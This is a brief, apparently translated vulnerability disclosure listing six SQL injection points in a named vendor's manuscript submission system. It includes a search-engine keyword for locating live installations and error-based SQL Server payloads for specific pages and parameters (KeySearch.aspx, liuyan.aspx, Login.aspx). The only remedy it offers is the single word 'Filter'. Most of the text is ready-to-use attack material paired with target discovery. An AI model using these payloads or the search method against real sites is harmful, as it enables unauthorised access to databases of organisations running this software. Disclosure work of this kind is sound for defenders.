Multiple SQL injection vulnerabilities in a general manuscript System (packaging)
Multiple SQL injection vulnerabilities in a general manuscript System (packaging)
Google Keyword: technical support: Nanjing jienuhan Software Technology Co., Ltd.
Its contribution system has multiple SQL injections, which are packaged here:
========================================================== ============
Injection Point 1:/KeySearch. aspx parameter: title POC: 'AND 1 = convert (int, (@ version) +'
Injection Point 2:/KeySearch. aspx parameter: author POC: 'AND 1 = convert (int, (@ version) +'
Injection Point 3:/KeySearch. aspx parameter: keyword POC: 'AND 1 = convert (int, (@ version) +'
Injection Point 4:/liuyan. aspx parameter: LinkTel POC: '+ convert (int, (@ version) +'
Injection Point 5:/liuyan. aspx parameter: Mail POC: '+ convert (int, (@ version) +'
Injection Point 6:/Login. aspx parameter: username POC: '+ (select convert (int, (@ version) FROM syscolumns) +'
Solution:
Filter